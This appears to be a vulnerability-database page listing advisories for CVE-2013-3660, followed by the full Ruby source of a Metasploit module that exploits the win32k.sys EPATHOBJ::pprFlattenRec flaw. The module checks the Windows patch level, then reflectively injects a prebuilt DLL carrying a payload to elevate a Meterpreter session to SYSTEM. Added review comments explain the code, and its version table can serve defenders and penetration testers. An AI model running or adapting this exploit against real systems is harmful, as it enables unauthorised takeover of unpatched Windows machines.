| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
| Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation | 2 Jul 2013 00:00 | – | zdt | |
| Security Bulletin: Libxml2 vulnerabilities in Network Intrusion Prevention System (CVE-2014-0191, CVE-2013-2877, CVE-2014-3660, CVE-2013-5211) | 23 Feb 2022 19:48 | – | ibm | |
| CVE-2013-3660 | 24 May 2013 00:00 | – | attackerkb | |
| CVE-2013-3660 | 21 May 2013 00:00 | – | circl | |
| Microsoft Win32k Privilege Escalation Vulnerability | 28 Mar 2022 00:00 | – | cisa_kev | |
| CVE-2013-3660 | 24 May 2013 20:00 | – | cve | |
| CVE-2013-3660 | 24 May 2013 20:00 | – | cvelist | |
| Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Local Privilege Escalation (Metasploit) | 2 Jul 2013 00:00 | – | exploitdb | |
| Advance Notification Service for July 2013 Security Bulletin Release | 4 Jul 2013 07:00 | – | msrc | |
| CVE-2013-3660 | 24 May 2013 20:55 | – | nvd | |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # Local privilege escalation for CVE-2013-3660 (vendor fix tracked as
  # MS13-053 in References): EPATHOBJ::pprFlattenRec in win32k.sys uses
  # uninitialized data. x86 Windows only. The trigger itself lives in a
  # prebuilt DLL that #exploit reflectively injects; this file only holds
  # metadata, the version-based #check and the preconditions around the
  # injection. The version table in #check doubles as a patch-level
  # reference for defenders.
  Rank = AverageRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  # Registers module metadata: name, description, authors, references,
  # platform/arch constraints, default options, payload limits and the
  # Meterpreter command that #check depends on.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation',
          'Description' => %q{
This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage
of uninitialized data which allows to corrupt memory. At the moment, the module has
been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
},
          'License' => MSF_LICENSE,
          'Author' => [
            'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Vulnerability discovery and Original Exploit
            'progmboy <programmeboy[at]gmail.com>', # Original Exploit
            'Keebie4e', # Metasploit integration
            'egypt', # Metasploit integration
            'sinn3r', # Metasploit integration
            'Ben Campbell', # Metasploit integration
            'juan vazquez', # Metasploit integration
            'OJ Reeves' # Metasploit integration
          ],
          # 32-bit only; #exploit additionally rejects x64 sessions at runtime.
          'Arch' => ARCH_X86,
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread',
            # The exploit thread can take a while; #exploit reports this
            # value as the expected wait.
            'WfsDelay' => 30
          },
          'Targets' => [
            [ 'Automatic', {} ]
          ],
          'Payload' => {
            'Space' => 4096,
            'DisableNops' => true
          },
          'References' => [
            [ 'CVE', '2013-3660' ],
            [ 'EDB', '25912' ],
            [ 'OSVDB', '93539' ],
            [ 'MSB', 'MS13-053' ], # vendor bulletin; the fixed win32k.sys revisions are listed in #check
            [ 'URL', 'https://seclists.org/fulldisclosure/2013/May/91' ],
          ],
          'DisclosureDate' => '2013-05-15',
          'DefaultTarget' => 0,
          'Compat' => {
            'Meterpreter' => {
              # #check resolves %windir% through this command.
              'Commands' => %w[
                stdapi_sys_config_getenv
              ]
            }
          }
        }
      )
    )
  end

  # Decides whether the target looks vulnerable from the win32k.sys file
  # version. Only Windows sessions are examined; `build` selects the OS
  # line and `revision` (split by servicing branch where two lines exist)
  # is compared with the first revision treated as patched.
  #
  # @return [Exploit::CheckCode] Appears when the version predates the fix;
  #   Safe for non-Windows sessions, builds not in the table, and revisions
  #   at or above the patched one
  def check
    if session.platform == 'windows'
      # `<<` appends in place to the String returned by getenv. Harmless if
      # that is a fresh String per call; NOTE(review): confirm the value is
      # not cached by the session object, since this would mutate the cache.
      file_path = session.sys.config.getenv('windir') << '\\system32\\win32k.sys'
      # NOTE(review): if file_version cannot read the file it presumably
      # returns nil; every field is then nil and the `revision <`
      # comparisons below raise NoMethodError instead of returning Safe —
      # verify against the FileInfo mixin before relying on #check output.
      major, minor, build, revision, branch = file_version(file_path)
      vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")
      # Reference versions: a revision below the number listed for its
      # build is reported as Appears. Where two numbers are given, the
      # first belongs to the 18xxx/16xxx revision line and the second to
      # the 2xxxx line; `branch` chooses between them below.
      # WinXP x86 - 5.1.2600.6404
      # WinXP/2003 5.2.3790.5174
      # WinVista/2k8 - 6.0.6002.18861 / 6.0.6002.23132
      # Win72k8R2 - 6.1.7601.18176 / 6.1.7601.22348
      # Win8/2012 - 6.2.9200.16627 / 6.2.9200.20732
      case build
      when 2600
        return Exploit::CheckCode::Appears if revision < 6404
      when 3790
        return Exploit::CheckCode::Appears if revision < 5174
      when 6000
        # No patched revision listed for this build: always Appears.
        return Exploit::CheckCode::Appears
      when 6001
        # Same as 6000: no patched revision listed.
        return Exploit::CheckCode::Appears
      when 6002
        # `branch` presumably carries the leading digits of the revision
        # (18 for the 18xxx line) — TODO confirm against file_version.
        if branch == 18
          return Exploit::CheckCode::Appears if revision < 18861
        elsif revision < 23132
          return Exploit::CheckCode::Appears
        end
      when 7600
        # No patched revision listed for this build: always Appears.
        return Exploit::CheckCode::Appears
      when 7601
        if branch == 18
          return Exploit::CheckCode::Appears if revision < 18176
        elsif revision < 22348
          return Exploit::CheckCode::Appears
        end
      when 9200
        if branch == 16
          return Exploit::CheckCode::Appears if revision < 16627
        elsif revision < 20732
          return Exploit::CheckCode::Appears
        end
      end
    end
    # Reached for non-Windows sessions, builds not in the table, and any
    # listed build whose revision did not satisfy its `<` comparison.
    return Exploit::CheckCode::Safe
  end

  # Runs the exploitation. Three preconditions abort via fail_with: an
  # already-SYSTEM session (Failure::None), a Safe result from #check
  # (Failure::NotVulnerable) and a 64-bit target (Failure::NoTarget).
  # Otherwise the prebuilt x86 DLL from the framework data directory is
  # reflectively injected into a new process with the encoded payload as
  # its argument, and the method returns while that thread is still running.
  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end
    # Runtime counterpart of the ARCH_X86 metadata constraint.
    if sysinfo['Architecture'] == ARCH_X64
      fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')
    end
    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Reflectively injecting the DLL into a new process and triggering the LPE...')
    encoded_payload = payload.encoded
    # The DLL path is built under Msf::Config.data_directory; this method
    # does not verify the file exists before handing it to execute_dll.
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-3660', 'ppr_flatten_rec.x86.dll'),
      encoded_payload
    )
    # This method does not wait itself; it only reports the WfsDelay value
    # (default 30 from DefaultOptions). The actual wait is presumably
    # handled by the framework's session handler — outside this file.
    print_status("Exploit thread executing (can take a while to run), waiting #{datastore['WfsDelay']} sec ...")
  end
end